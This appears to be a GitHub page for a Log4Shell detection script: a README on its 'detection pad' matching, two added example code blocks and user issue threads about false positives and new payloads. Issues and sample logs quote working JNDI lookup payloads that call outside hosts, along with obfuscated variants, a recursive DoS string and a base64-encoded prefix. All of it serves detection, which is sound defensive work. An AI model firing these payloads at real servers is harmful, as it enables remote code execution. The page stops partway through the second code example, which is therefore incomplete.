Detector for Log4Shell exploitation attempts

Overview

log4shell-detector

Idea

The problem with the log4j CVE-2021-44228 exploitation is that the string can be heavily obfuscated in many different ways. It is impossible to cover all possible forms with a reasonable regular expression.

The idea behind this detector is that the respective characters have to appear in a log line in a certain order to match.

${jndi:ldap:

Split up into a list it would look like this:

['$', '{', 'j', 'n', 'd', 'i', ':', 'l', 'd', 'a', 'p', ':']

I call these lists 'detection pads' in my script and process each log line character by character. For each detection pad, I check whether the current character matches the element the pad's pointer currently points at; if it does, that pointer moves forward by one.

When the pointer reaches the end of the list, the detection is triggered and the script prints the file name, the complete log line, the detected string and the line number within the file.

I've included a decoder for URL based encodings. If we need more, please let me know.
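Added example (not the project's own code): a minimal Python implementation of the detection-pad idea described above, with the repeated URL decoding and a maximum distance between matched characters modelled on the -d option listed under Usage. The pad list, the default distance of 40 and the names decode_line, check_line and scan_lines are assumptions made for this example.

```python
from urllib.parse import unquote

# Constructed set of pads; the real script's detection string list is not
# reproduced on this page, so these three are assumptions.
DETECTION_STRINGS = ["${jndi:ldap:", "${jndi:rmi:", "${jndi:dns:"]
DETECTION_PADS = [list(s) for s in DETECTION_STRINGS]


def decode_line(line):
    """Undo URL encoding until the text stops changing.

    Repeating the decode handles double encoding such as %2524 -> %24 -> $,
    which a single unquote() would leave as '%24'.
    """
    previous = None
    while previous != line:
        previous = line
        line = unquote(line)
    return line


def check_line(line, max_distance=40):
    """Return the detection string whose pad completes on this line, else None.

    max_distance is the largest gap, in characters, allowed between two
    consecutive matched pad characters (modelled on the -d option; the default
    of 40 is an assumption for this example). A pad whose pointer has not
    advanced within that gap is reset to the start, which is what stops
    ordinary text containing '${' from slowly walking a pad to its end.
    """
    decoded = decode_line(line).lower()
    pointers = [0] * len(DETECTION_PADS)   # next expected index per pad
    last_hit = [-1] * len(DETECTION_PADS)  # position of the last matched char
    # Iterate the string directly; no list(decoded) copy is needed.
    for pos, c in enumerate(decoded):
        for i, pad in enumerate(DETECTION_PADS):
            if pointers[i] > 0 and pos - last_hit[i] > max_distance:
                pointers[i] = 0            # stale partial match: start over
            if c == pad[pointers[i]]:
                pointers[i] += 1
                last_hit[i] = pos
                if pointers[i] == len(pad):
                    return DETECTION_STRINGS[i]
    return None


def scan_lines(lines, max_distance=40):
    """Scan an iterable of log lines; return (line_number, match, line) tuples."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = check_line(line, max_distance)
        if match:
            hits.append((number, match, line))
    return hits


if __name__ == "__main__":
    # Constructed sample log lines, not taken from any real system.
    SAMPLE_LOG = [
        'GET / HTTP/1.1" 200 "Mozilla/5.0"',
        'GET /?x=${jndi:ldap://attacker.invalid/a} HTTP/1.1" 404',
        'GET /?x=%24%7Bjndi%3Adns%3A//attacker.invalid/a%7D HTTP/1.1" 404',
        'solutionUser.name = ${solution-user.name}',
    ]
    for number, match, line in scan_lines(SAMPLE_LOG):
        print("LINE_NUMBER: %d DEOBFUSCATED_STRING: %s LINE: %s"
              % (number, match, line))
```

The distance limit is the knob to turn when long configuration or template lines full of `${...}` placeholders trigger a pad without containing a real payload.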

Usage

usage: log4shell-detector.py [-h] [-p path [path ...]] [-d maxdis] [--quick] [--defaultpaths] [--debug]

Log4Shell Exploitation Detectors

optional arguments:
  -h, --help          show this help message and exit
  -p path [path ...]  Path to scan
  -d distance         Maximum distance between each character
  --quick             Skip log lines that don't contain a 2021 or 2022 time stamp
  --defaultpaths      Scan a set of default paths that should contain relevant log files.
  --debug             Debug output

Special Flags

--quick

Only checks log lines that contain a 2021 or 2022 time stamp, so older log entries are skipped entirely. We assume that the vulnerability wasn't exploited in 2019 and earlier.

--defaultpaths

Check a list of default log paths used by different software products.

Requirements

  • Python3

No further or special Python modules are required. It should run on any system that runs Python3.

Help

There are several ways you can help:

A. Test it against the payloads that you find in the wild and let me know if we miss something
B. Help me find and fix bugs
C. Test if the script runs with Python 2; if not, we can add a slightly modified version to the repo

Contact

Twitter: @cyberops

Comments
  • Refactor detector into a module and add Base64 Decoding

    Refactor detector into a module and add Base64 Decoding

    • Refactor the detector into a module so that it can be called from other places (i.e. threat hunting notebooks)
    • Add a sample for Base64 obfuscation
    • Handle Base64 obfuscation in a more robust way vs looking only for a full string
    opened by JasonKeirstead 9
  • Need assistance with script

    Need assistance with script

    I submitted an issue previously but it was closed without a resolution. Below is the log file. At the end of the script it says it found one exploit attempt, but there were none listed in the actual script per the screenshots of the script on the main page. Simply a deobfuscated string which I'm well aware of that data is in plain text, and isn't an exploit attempt. So unsure why it's stating exploit attempt. Any clarification would be appreciated.

    [.] Starting scan DATE: 2021-12-13 11:37:03.460995
    [.] Scanning FOLDER: /var/log ...
    [.] Processing /var/log/syslog.3.gz ...
    [...]
    [.] Processing /var/log/apt/eipp.log.xz ...
    [!] FILE: /var/log/auth.log LINE_NUMBER: 124 DEOBFUSCATED_STRING: ${jndi:nds:/ LINE: Dec 13 10:56:12 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/egrep -I -i -r $({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+ /var/log
    [!] 1 files with exploitation attempts detected in PATH: /var/log
    [!!!] 1 exploitation attempts detected in the complete scan
    [.] Finished scan DATE: 2021-12-13 12:01:46.740776
    [.] Scan took the following time to complete DURATION: 0 hours 24 minutes 43 seconds

    opened by Viceman256 7
  • Exploit attempt?

    Exploit attempt?

    I have ran this script on my pi. Per your screenshot you can see a line stating an exploit attempt. Mine says at the end that there is an exploit attempt, but doesn't tell me which log. I also get an error on one of the files, could be triggering that alert.

    [.] Starting scan DATE: 2021-12-13 11:37:03.460995
    [.] Scanning FOLDER: /var/log ...
    [.] Processing /var/log/syslog.3.gz ...
    [...]
    [.] Processing /var/log/apt/eipp.log.xz ...
    [!] FILE: /var/log/auth.log LINE_NUMBER: 124 DEOBFUSCATED_STRING: ${jndi:nds:/ LINE: Dec 13 10:56:12 raspberrypi sudo: pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/usr/bin/egrep -I -i -r $({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+ /var/log
    [!] 1 files with exploitation attempts detected in PATH: /var/log
    [!!!] 1 exploitation attempts detected in the complete scan
    [.] Finished scan DATE: 2021-12-13 12:01:46.740776
    [.] Scan took the following time to complete DURATION: 0 hours 24 minutes 43 seconds

    opened by Viceman256 4
  • defaultdict for matches, format output, summary option, simpler Python2 compatibility

    defaultdict for matches, format output, summary option, simpler Python2 compatibility

    • Changed matches to be in a defaultdict with files and line numbers as keys
    • Added a summary option that only prints files and line numbers
    • Simplified Python2 compatibility check, removes need for sys
      • Verified works on Python 2.7.16
    • Formatted output to be leveled file --> line number --> match
    • Simplified argparse requirement for an input
    opened by stephanGarland 4
  • "Exploitation attempt detected", but pattern not in DETECTION_STRINGS. False positive?

    log4shell-detector.py detects an exploitation attempt via pattern ${jndi:ldap: in a log file, but the pattern is not in the log:

    [!!!] Exploitation attempt detected FILE: /var/log/firstboot/vpxd-svcs_firstboot.py_24133_stdout.log LINE_NUMBER: 22 LINE: 2021-03-12T00:12:10.861Z ['# invsvc cisreg props\n', 'solutionUser.name = ${solution-user.name}\n', 'solutionUser.ownerId = ${solution-user.name}@${vmdir.domain-name}\n', 'cmreg.serviceid = ${invsvc.service-id}\n', '# invsvc registration spec properties\n', 'serviceVersion = 1.0\n', 'ownerId = ${solution-user.name}@${vmdir.domain-name}\n', 'serviceType.product = com.vmware.cis\n', 'serviceType.type = cs.inventory\n', 'serviceNameResourceKey = cs.inventory.ServiceName\n', 'serviceDescriptionResourceKey = cs.inventory.ServiceDescription\n', 'serviceGroupResourceKey = cs.inventory.servicegroupresource\n', 'serviceGroupInternalId = cs\n', 'controlScriptPath = ${controlscript.path}\n', 'hostId = ${sca.hostid}\n', 'endpoint0.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc\n', 'endpoint0.type.protocol = http\n', 'endpoint0.type.id = com.vmware.cis.inventory\n', 'endpoint1.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vmomi/sdk\n', 'endpoint1.type.protocol = vmomi\n', 'endpoint1.type.id = com.vmware.cis.inventory.server\n', 'endpoint2.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vmomi/sdk\n', 'endpoint2.type.protocol = vmomi\n', 'endpoint2.type.id = com.vmware.cis.tagging.server\n', 'endpoint3.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/vapi\n', 'endpoint3.type.protocol = vapi.json.https\n', 'endpoint3.type.id = com.vmware.cis.inventory.vapi\n', 'endpoint3.data0.key = com.vmware.vapi.metadata.metamodel.file.authz\n', 'endpoint3.data0.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_metamodel.json\n', 'endpoint3.data1.key = com.vmware.vapi.metadata.authentication.file.authz\n', 'endpoint3.data1.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_authentication.json\n', 'endpoint3.data2.key = com.vmware.vapi.metadata.routing.file.authz\n', 
'endpoint3.data2.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/authz/authz_routing.json\n', 'endpoint3.data3.key = com.vmware.vapi.metadata.metamodel.file.tagging\n', 'endpoint3.data3.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_metamodel.json\n', 'endpoint3.data4.key = com.vmware.vapi.metadata.authentication.file.tagging\n', 'endpoint3.data4.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_authentication.json\n', 'endpoint3.data5.key = com.vmware.vapi.metadata.cli.file.tagging\n', 'endpoint3.data5.value = /usr/lib/vmware-vpxd-svcs/vapi-metadata/tagging/com.vmware.cis.tagging_cli.json\n', 'endpoint4.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}\n', 'endpoint4.type.protocol = gRPC\n', 'endpoint4.type.id = tagging\n', 'endpoint4.data0.key = cis.common.ep.localurl\n', 'endpoint4.data0.value = http://localhost:##{TAGGING_GRPC_PORT}##\n', 'attribute0.key = Syncable\n', 'attribute0.value = ELM,SPOG\n', 'attribute1.key = Subscribable\n', 'attribute1.value = true\n', 'health.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/invsvc-health\n', 'resourcebundle.url = https://${system.urlhostname}:${rhttpproxy.ext.port2}/invsvc/invsvc-resource\n', 'resourcebundle.data0.key = com.vmware.cis.common.resourcebundle.basename\n', 'resourcebundle.data0.value = cs.inventory.ResourceBundle\n', '# reverse proxy configuration\n', 'rhttpproxy.file = invsvc-proxy.conf\n', 'rhttpproxy.endpoint0.namespace = /invsvc\n', 'rhttpproxy.endpoint0.connectionType = local\n', 'rhttpproxy.endpoint0.address = ${vpxd-svcs.int.http}\n', 'rhttpproxy.endpoint0.httpAccessMode = redirect\n', 'rhttpproxy.endpoint0.httpsAccessMode = allow\n'] DEOBFUSCATED_STRING: ${jndi:ldap:

    opened by busch 3
  • gzipped log-file path validation

    gzipped log-file path validation

    The gzipped file path validation assumes that there is "log." string in path-name. This causes problems if log-file naming format is something like "SystemOut.log-20211212.gz". Could the dot (.) be removed from validation condition?

    opened by aylatalo 2
  • invalid character in cmd [Version 10.0.14393] on Windows Server 2016

    invalid character in cmd [Version 10.0.14393] on Windows Server 2016

    C:\Users\Administrator\Downloads>python log4shell-detector.py -p C:\windows
      File "C:\Users\Administrator\Downloads\log4shell-detector.py", line 106
        log4shell-detector/log4shell-detector.py at main · Neo23x0/log4shell-detector · GitHub
        ^
    SyntaxError: invalid character '·' (U+00B7)

    opened by atleast1eyeblnd 2
  • New payloads

    New payloads

    These payloads do not appear with a google or github search so I think they are new. Cloudflare WAF has pretty good detection rules for this, but their WAF did not block these.

    Please close this issue or do what you like with this information, I just wanted to share these somewhere where they may have some impact. I did not test them with this repo.

    IP: 89.248.173.140

    path query: /%3Fx=$%7Bjndi:ldap:/guidedhacking.com.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com/a%7D

    user agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{Hostname}}.c6tsifp2pij91e3kaft0cg7h1xayyyyyn.explorelocalpaths.com}

    It appears their expansion of {{Hostname}} did not work as intended in the user agent.

    opened by GH-Rake 1
  • MemoryError - [E] Can't process FILE: xxxx REASON: None

    MemoryError - [E] Can't process FILE: xxxx REASON: None

    scan_file
        result = self.check_line(line)
      File "xxxx/log4shell-detector-main/Log4ShellDetector/Log4ShellDetector.py", line 82, in check_line
        linechars = list(decoded_line)
    MemoryError
    [E] Can't process FILE: xxxx REASON: None

    This can be an issue, especially with --auto detection, unusual txt files and memory limited environments.

    There is unnecessary list conversion in Log4ShellDetector. In this case no need to convert string to list in order to iterate the characters in the string. If list conversion is skipped, memory usage should decrease.

    "for c in linechars:" is same as "for c in decoded_line:"

    opened by boog1ebug 1
  • http statuscode to exploit attempts

    http statuscode to exploit attempts

    Hello,

    thanks for this tool. How would you detect if an exploit has been successful via the http codes? Would 404 code mean the request has been blocked and any 2xx code that it was successful?

    Thanks in advance.

    opened by 4jwWa2EnYK5FIIaK7AVp 1
  • Add references/steps to follow for removing the exploit.

    Add references/steps to follow for removing the exploit.

    I ran the script on my server and got the below results. However, neither Java nor log4j is installed on my server. Please guide me on what to do next.

    sudo python3 log4shell-detector.py -p /var/log/ --summary

    [.] Starting scan DATE: 2021-12-14 05:34:03.155342
    [.] Scanning FOLDER: /var/log/ ...

    [!] 10 files with exploitation attempts detected in PATH: /var/log/
    [!] FILE: /var/log/gitlab/gitlab-workhorse/current LINE_NUMBER: 255 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 1489 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2204 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2205 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2444 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.3.gz LINE_NUMBER: 2445 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 1 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 2 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 3 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 136 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 157 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 158 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 159 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 372 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 373 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 374 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 375 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 376 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 581 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 582 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 583 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 584 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.2.gz LINE_NUMBER: 1227 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 25 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 52 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 63 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 64 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 165 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1332 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1537 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/nginx/gitlab_access.log.1.gz LINE_NUMBER: 1580 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/gitlab-rails/production.log.2.gz LINE_NUMBER: 2043 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production.log.2.gz LINE_NUMBER: 2045 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 504 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 505 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.1.gz LINE_NUMBER: 5507 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6339 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6340 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.3.gz LINE_NUMBER: 6932 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production.log.1.gz LINE_NUMBER: 1878 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/gitlab-rails/production.log.1.gz LINE_NUMBER: 1880 STRING: ${jndi:dns:/
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 5 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 6 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 474 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 1422 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 1423 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 2527 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production_json.log.2.gz LINE_NUMBER: 2528 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production.log.3.gz LINE_NUMBER: 30592 STRING: ${jndi:ldap:
    [!] FILE: /var/log/gitlab/gitlab-rails/production.log.3.gz LINE_NUMBER: 30594 STRING: ${jndi:ldap:
    [!!!] 50 exploitation attempts detected in the complete scan
    [.] Finished scan DATE: 2021-12-14 05:50:44.095624
    [.] Scan took the following time to complete DURATION: 0 hours 16 minutes 40 seconds

    opened by harishch4 1
  • Modified script for including more payloads

    Modified script for including more payloads

    Thanks for the wonderful code for detecting the payloads! I tested this script against a variety of known payloads available and found it is failing to detect some payloads containing invalid unicode characters; you can find the example here: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words So I created another function to decode these invalid unicodes to ASCII using a package called "anyascii" (so one needs to install this package using pip, hoping it is not an inconvenience), decoded these strings and added conditional statements for dealing with non-ASCII characters.

    Also I added the encoded example of these invalid unicodes in the testing script with a heading "invalid unicodes" in the plain positive text category. I tested my script and I found some false positive cases, so as you can notice I modified these detection strings with an extra "/", so that it can bypass the false positive cases.

    Please review my code and kindly let me know any questions and suggestions you have! Thank you!

    opened by vidhyasasi 0
  • New payload results in DOS attack

    New payload results in DOS attack

    Thank you for the brilliant code for scanning the payload! I have an issue as follows. Payload Description: If a string substitution is attempted for any reason on the following string, it will trigger an infinite recursion, and the application will crash: ${${::-${::-$${::-j}}}}. Reference: https://issues.apache.org/jira/browse/LOG4J2-3230

    I tried the script to test whether it could bypass the mentioned payload and unfortunately it could not. So is it possible to modify the script to include this payload as well? Thanks!

    opened by vidhyasasi 0
  • Not working in version 0.11.1 / No module named 'Log4ShellDetector'

    Not working in version 0.11.1 / No module named 'Log4ShellDetector'

    MyUser@MyHost:scripts>python3 Log4ShellDetector --auto
    Traceback (most recent call last):
      File "/home/MyUser/scripts/Log4ShellDetector", line 16, in <module>
        import Log4ShellDetector.Log4ShellDetector as Log4ShellDetector
    ModuleNotFoundError: No module named 'Log4ShellDetector'

    opened by MaFreiberger 1
  • find command reports [wj]ar as listing log4j, but manual inspection diverges

    find command reports [wj]ar as listing log4j, but manual inspection diverges

    Hi there,

    many thanks again for all the hard work!

    The following command returns several matches for a Java program on a machine we have:

    find . -name '*[wj]ar' -print -exec sh -c 'jar tvf {} | grep log4j' \;
    

    But, a manual inspection of those matched files shows empty grep results. For example, the following file matches:

    ./lib/xml.jar
    

    If I run jar tvf on that, then I get the output in the attached file:

    https://www.dropbox.com/s/snzdgxzlx9fhucy/lib_xml_jar_tvf.txt?dl=0

    Running this through grep log4j returns an empty result:

    me@host:/opt/IBM/SPSS/Concurrent_Licensing_Tools/sentinellm/JRE$ jar tvf ./lib/xml.jar | grep log4j
    
    me@host:/opt/IBM/SPSS/Concurrent_Licensing_Tools/sentinellm/JRE$
    

    I am not a pro with the find command, so not sure how to adjust it.

    Best wishes and many thanks, Rob

    opened by rennis250 0
  • False alarms?

    False alarms?

    First off, many thanks for this great tool in this terrible situation!

    Sorry if this is the wrong place to raise this, but it seems we might be getting false alarms on our system. I have run the detector a few times on /var/log and every time, it reports three lines as attempts in a cdebconf file, but the deobfuscated string is different each time.

    Here are three examples:

    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}
    
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:rmi: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}
    
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 65224 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-ku.UTF-8: Cîhaza ku hatiye hilbijartin partîsiyonên ji bo cîhazên RAiD dihundirîne. Ew cîhaz û partîsiyon dê werin rakirin:\n\nCîhaza Software RAID li bêr rakirinê ye: ${REMOVED_DEVICES}\n\nPartition ji hêla van cîhazên RAID ve hat bikaranîn: ${REMOVED_PARTITIONS}\n\nNîşe: Her wisa evê her tim hemû daneyên li ser cîhazên RAID yên nivîsbarî jê bibe.
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58996 DEOBFUSCATED_STRING: ${jndi:nis: LINE: Extended_description-sl.UTF-8: Povzetek trenutne nastavitve LVM:\n\n Prosti fizični nosilci:  ${FREE_PVS}\n Uporabljeni fizični nosilci:  ${USED_PVS}\n Skupine nosilcev:          ${VGS}\n Logični nosilci:        ${LVS}
    [!] FILE: /var/log/installer/cdebconf/templates.dat LINE_NUMBER: 58910 DEOBFUSCATED_STRING: ${jndi:dns: LINE: Extended_description-eo.UTF-8: Resumo de la nuna LVM-agordo:\n\n Liberaj Konkretaj Datumportiloj:  ${FREE_PVS}\n Uzataj Konktretaj Datumportiloj:  ${USED_PVS}\n Datumportilaj Grupoj:             ${VGS}\n Logikaj Datumportiloj:            ${LVS}
    

    In addition, the file has not been touched since 2015:

    -rw------- 1 root root 14M Mar 18  2015 /var/log/installer/cdebconf/templates.dat
    

    Everything else, including your quick tests to check for log4j (thanks very much for those, too!), indicates that our systems should hopefully be unaffected by the log4j vuln.

    Best wishes, Rob

    opened by rennis250 2
  • Add pattern '${base64:JHtqbmRp'

    Add pattern '${base64:JHtqbmRp'

    I request to add pattern ${base64:JHtqbmRp which is evaluated to ${jndi. I think with the current algorithm, the detector cannot detect this kind of pattern.

    Ref https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml#L40

    opened by baonq-me 7
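The two issues above pull in opposite directions: the first shows the character walk firing on a Debian installer translation string in templates.dat, the second asks for base64 lookups to be decoded before the walk so that `${base64:JHtqbmRp}` is seen as `${jndi`. The following Python is an added example written for this page, not the project's own code: it implements the README's detection-pad idea with a maximum character distance (the role of `-d`; the default of 40 here is an assumption, not the tool's), adds a base64-lookup decoder next to the URL decoder the README mentions, and runs both over constructed sample lines plus the templates.dat line quoted in the first issue. `JHtqbmRp` is the value from the issue; the longer `JHtqbmRpOmxkYXA6` is the base64 of `${jndi:ldap:` computed for this example. The closing brace on the base64 lookup is a requirement of this decoder, not of the detector.

```python
import base64
import binascii
import re
import urllib.parse

# Detection pads as described in the README: the characters of each pattern
# must appear in a log line in this order, possibly with other characters in
# between. The scheme list is the set seen in the tool output above.
DETECTION_PADS = [list("${jndi:%s:" % scheme) for scheme in ("ldap", "rmi", "dns", "nis")]

# A log4j base64 lookup such as ${base64:JHtqbmRp} (decodes to "${jndi").
# The closing brace is required here so the greedy character class does not
# swallow text that follows the lookup (assumption of this example).
BASE64_LOOKUP = re.compile(r"\$\{base64:([A-Za-z0-9+/=]+)\}")


def pad_match(line, pad, max_distance):
    """Walk `line` character by character and move a pointer along `pad`.

    A pad character only counts if it occurs no more than `max_distance`
    characters after the previously matched one; otherwise the walk restarts
    from the beginning of the pad. Returns the pad as a string on a full
    match, else None. Matching is case-insensitive (a choice of this example).
    """
    text = line.lower()
    pointer, last_hit = 0, -1
    for i, ch in enumerate(text):
        if pointer > 0 and i - last_hit > max_distance:
            pointer = 0                      # gap too large: start over
        if ch == pad[pointer]:
            pointer, last_hit = pointer + 1, i
            if pointer == len(pad):
                return "".join(pad)
    return None


def decode_base64_lookups(line):
    """Replace each ${base64:...} lookup with its decoded text.

    The lookup is left untouched when the payload is not valid base64 or does
    not decode to printable ASCII, so binary garbage never reaches the pads.
    """
    def _replace(match):
        payload = match.group(1)
        payload += "=" * (-len(payload) % 4)   # restore stripped padding
        try:
            decoded = base64.b64decode(payload, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            return match.group(0)
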